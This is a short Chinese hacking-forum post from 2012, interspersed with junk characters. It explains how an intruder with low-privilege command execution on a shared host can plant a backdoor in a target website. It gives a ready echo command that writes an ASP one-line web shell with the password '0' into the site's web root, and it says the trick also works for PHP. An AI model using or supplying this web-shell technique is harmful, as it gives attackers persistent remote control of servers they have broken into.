在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。, Z8 ^4 o2 X$ \
; ?* y9 b% \8 @/ E8 S
命令格式
) ^" v) I: g9 ^1 _4 b7 F) M. Q! ?' J& w+ Z1 q; y" P! T
Echo 语句 >目标站绝对目录7 A+ ?( K2 [: N+ L$ r
. K* E: A% J F4 c3 Z例如: 9 G" X& ]3 f( O5 p0 Q7 N. A1 V
, Z# T; Z& ^: S; fecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp+ S* v8 b/ a7 M9 J. O$ Z
/ }$ R+ u* N6 O3 K& D这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。3 B, v F2 C9 D) G
|
发表于 2012-9-23 14:40:24
收藏
支持
反对